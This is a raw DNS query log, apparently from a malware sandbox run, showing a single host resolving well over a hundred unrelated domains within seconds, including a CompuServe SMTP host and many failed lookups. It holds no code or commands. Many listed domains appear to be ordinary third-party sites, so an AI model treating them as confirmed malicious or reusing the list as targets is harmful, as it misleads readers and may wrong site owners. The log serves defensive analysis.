                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.847656012 CEST8.8.8.8192.168.2.30x150cServer failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.933590889 CEST8.8.8.8192.168.2.30xd801No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:13.960676908 CEST8.8.8.8192.168.2.30xc589No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.027168036 CEST8.8.8.8192.168.2.30x3021No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.140991926 CEST8.8.8.8192.168.2.30x1d3bNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.266881943 CEST8.8.8.8192.168.2.30x4fb5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.638158083 CEST8.8.8.8192.168.2.30x1856Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.657629013 CEST8.8.8.8192.168.2.30x413eNo error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.657629013 CEST8.8.8.8192.168.2.30x413eNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.657629013 CEST8.8.8.8192.168.2.30x413eNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.657629013 CEST8.8.8.8192.168.2.30x413eNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.732783079 CEST8.8.8.8192.168.2.30x856eNo error (0)umcor.am188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.732783079 CEST8.8.8.8192.168.2.30x856eNo error (0)umcor.am188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.793859005 CEST8.8.8.8192.168.2.30xa126No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.794460058 CEST8.8.8.8192.168.2.30x2f5fNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.802118063 CEST8.8.8.8192.168.2.30xa7faNo error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.945555925 CEST8.8.8.8192.168.2.30x4a2dServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.956240892 CEST8.8.8.8192.168.2.30xcf92No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:14.999794006 CEST8.8.8.8192.168.2.30x1580No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.032371998 CEST8.8.8.8192.168.2.30x739eNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.160645962 CEST8.8.8.8192.168.2.30x7534No error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.160645962 CEST8.8.8.8192.168.2.30x7534No error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.206808090 CEST8.8.8.8192.168.2.30xc7d8Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.273711920 CEST8.8.8.8192.168.2.30x4fb5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.424835920 CEST8.8.8.8192.168.2.30x56c0No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.734484911 CEST8.8.8.8192.168.2.30x4749Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:15.868808985 CEST8.8.8.8192.168.2.30xc7d8Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.056123018 CEST8.8.8.8192.168.2.30x82d8No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.251743078 CEST8.8.8.8192.168.2.30x1889No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.251743078 CEST8.8.8.8192.168.2.30x1889No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.251743078 CEST8.8.8.8192.168.2.30x1889No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.251743078 CEST8.8.8.8192.168.2.30x1889No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.310432911 CEST8.8.8.8192.168.2.30x4fb5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.319812059 CEST8.8.8.8192.168.2.30x9948No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.332433939 CEST8.8.8.8192.168.2.30xb16aNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.332854033 CEST8.8.8.8192.168.2.30x2243No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.332854033 CEST8.8.8.8192.168.2.30x2243No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.345040083 CEST8.8.8.8192.168.2.30xd208No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.349383116 CEST8.8.8.8192.168.2.30xf3No error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.367057085 CEST8.8.8.8192.168.2.30xd916No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.457732916 CEST8.8.8.8192.168.2.30xa464No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.457732916 CEST8.8.8.8192.168.2.30xa464No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.466043949 CEST8.8.8.8192.168.2.30x7c6bNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.494874001 CEST8.8.8.8192.168.2.30x22Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.538846970 CEST8.8.8.8192.168.2.30x823No error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.542879105 CEST8.8.8.8192.168.2.30x86e3No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.542879105 CEST8.8.8.8192.168.2.30x86e3No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.578902006 CEST8.8.8.8192.168.2.30xa110Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.627460957 CEST8.8.8.8192.168.2.30xa71fNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.646656036 CEST8.8.8.8192.168.2.30xe8b5Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.654027939 CEST8.8.8.8192.168.2.30x1856Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.658770084 CEST8.8.8.8192.168.2.30x20d0No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.658770084 CEST8.8.8.8192.168.2.30x20d0No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.688560009 CEST8.8.8.8192.168.2.30x5511No error (0)oh28ya.com52.194.81.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.688560009 CEST8.8.8.8192.168.2.30x5511No error (0)oh28ya.com3.113.205.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.691797972 CEST8.8.8.8192.168.2.30xf01eNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.706619024 CEST8.8.8.8192.168.2.30x4f9cNo error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.706619024 CEST8.8.8.8192.168.2.30x4f9cNo error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.706619024 CEST8.8.8.8192.168.2.30x4f9cNo error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.706619024 CEST8.8.8.8192.168.2.30x4f9cNo error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.706619024 CEST8.8.8.8192.168.2.30x4f9cNo error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.708060026 CEST8.8.8.8192.168.2.30x5b7aNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.708060026 CEST8.8.8.8192.168.2.30x5b7aNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.709268093 CEST8.8.8.8192.168.2.30xbe4aNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.709268093 CEST8.8.8.8192.168.2.30xbe4aNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.810863972 CEST8.8.8.8192.168.2.30xced2Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.824274063 CEST8.8.8.8192.168.2.30x315fNo error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.877111912 CEST8.8.8.8192.168.2.30x3590No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.889148951 CEST8.8.8.8192.168.2.30x922No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.889405012 CEST8.8.8.8192.168.2.30x4b6fNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.900983095 CEST8.8.8.8192.168.2.30x20adNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.976607084 CEST8.8.8.8192.168.2.30x14f8No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.976607084 CEST8.8.8.8192.168.2.30x14f8No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.976607084 CEST8.8.8.8192.168.2.30x14f8No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.991620064 CEST8.8.8.8192.168.2.30xdebaNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:16.991620064 CEST8.8.8.8192.168.2.30xdebaNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.116132975 CEST8.8.8.8192.168.2.30xb735No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.116132975 CEST8.8.8.8192.168.2.30xb735No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.116132975 CEST8.8.8.8192.168.2.30xb735No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.124017954 CEST8.8.8.8192.168.2.30x7dc0No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.124017954 CEST8.8.8.8192.168.2.30x7dc0No error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.125140905 CEST8.8.8.8192.168.2.30xf446No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.125140905 CEST8.8.8.8192.168.2.30xf446No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.125140905 CEST8.8.8.8192.168.2.30xf446No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.125962019 CEST8.8.8.8192.168.2.30x3786No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.212898016 CEST8.8.8.8192.168.2.30xc0adNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.212898016 CEST8.8.8.8192.168.2.30xc0adNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.263545036 CEST8.8.8.8192.168.2.30x3d78No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.284240961 CEST8.8.8.8192.168.2.30xfd90No error (0)www.petsfan.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.284240961 CEST8.8.8.8192.168.2.30xfd90No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.284240961 CEST8.8.8.8192.168.2.30xfd90No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.284240961 CEST8.8.8.8192.168.2.30xfd90No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.290491104 CEST8.8.8.8192.168.2.30xdc9fServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.298113108 CEST8.8.8.8192.168.2.30x66d4No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.298113108 CEST8.8.8.8192.168.2.30x66d4No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.327518940 CEST8.8.8.8192.168.2.30x6fcbName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.345108032 CEST8.8.8.8192.168.2.30x32c2No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.367192984 CEST8.8.8.8192.168.2.30x74bbNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.367192984 CEST8.8.8.8192.168.2.30x74bbNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.370565891 CEST8.8.8.8192.168.2.30x17edNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.370565891 CEST8.8.8.8192.168.2.30x17edNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.383532047 CEST8.8.8.8192.168.2.30x1d47No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.406167984 CEST8.8.8.8192.168.2.30x5381No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.455182076 CEST8.8.8.8192.168.2.30xc873Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.471219063 CEST8.8.8.8192.168.2.30xed43Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.471968889 CEST8.8.8.8192.168.2.30x1ac9No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.471968889 CEST8.8.8.8192.168.2.30x1ac9No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.483125925 CEST8.8.8.8192.168.2.30x521No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.483125925 CEST8.8.8.8192.168.2.30x521No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.487591028 CEST8.8.8.8192.168.2.30x465bNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.487591028 CEST8.8.8.8192.168.2.30x465bNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.498276949 CEST8.8.8.8192.168.2.30x5721No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.531065941 CEST8.8.8.8192.168.2.30x21d3No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.542557001 CEST8.8.8.8192.168.2.30x4f59No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.542557001 CEST8.8.8.8192.168.2.30x4f59No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.564652920 CEST8.8.8.8192.168.2.30xc286No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.570920944 CEST8.8.8.8192.168.2.30x60ebNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.573525906 CEST8.8.8.8192.168.2.30xc8b5No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.573525906 CEST8.8.8.8192.168.2.30xc8b5No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.677937031 CEST8.8.8.8192.168.2.30x40f9No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.677937031 CEST8.8.8.8192.168.2.30x40f9No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.684788942 CEST8.8.8.8192.168.2.30xf52bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.694439888 CEST8.8.8.8192.168.2.30x15e1No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.757046938 CEST8.8.8.8192.168.2.30xaa0eNo error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.757046938 CEST8.8.8.8192.168.2.30xaa0eNo error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.807934046 CEST8.8.8.8192.168.2.30x9a2cNo error (0)www.cokocoko.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.807934046 CEST8.8.8.8192.168.2.30x9a2cNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.807934046 CEST8.8.8.8192.168.2.30x9a2cNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.807934046 CEST8.8.8.8192.168.2.30x9a2cNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.825020075 CEST8.8.8.8192.168.2.30x585No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.825020075 CEST8.8.8.8192.168.2.30x585No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.942116976 CEST8.8.8.8192.168.2.30x548bNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.942116976 CEST8.8.8.8192.168.2.30x548bNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.964504004 CEST8.8.8.8192.168.2.30xea7No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:17.964504004 CEST8.8.8.8192.168.2.30xea7No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.022696018 CEST8.8.8.8192.168.2.30xc849Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.056147099 CEST8.8.8.8192.168.2.30x8f2aName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.087064028 CEST8.8.8.8192.168.2.30xe8f3Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.119126081 CEST8.8.8.8192.168.2.30xfb96No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.119126081 CEST8.8.8.8192.168.2.30xfb96No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.120796919 CEST8.8.8.8192.168.2.30xdba9No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.133464098 CEST8.8.8.8192.168.2.30xb849Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.148216009 CEST8.8.8.8192.168.2.30x3756No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.148216009 CEST8.8.8.8192.168.2.30x3756No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.188143969 CEST8.8.8.8192.168.2.30x22Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.240519047 CEST8.8.8.8192.168.2.30x835No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.263159037 CEST8.8.8.8192.168.2.30x511Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.296473980 CEST8.8.8.8192.168.2.30x7a85Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.319744110 CEST8.8.8.8192.168.2.30xb629Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.344572067 CEST8.8.8.8192.168.2.30xef42Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.355468035 CEST8.8.8.8192.168.2.30xaa94No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.364608049 CEST8.8.8.8192.168.2.30x4300No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.374681950 CEST8.8.8.8192.168.2.30x7239Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.386086941 CEST8.8.8.8192.168.2.30x4fb5Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.429503918 CEST8.8.8.8192.168.2.30xeecfName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.471971989 CEST8.8.8.8192.168.2.30xd6baNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:18.515294075 CEST8.8.8.8192.168.2.30x3ae3No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
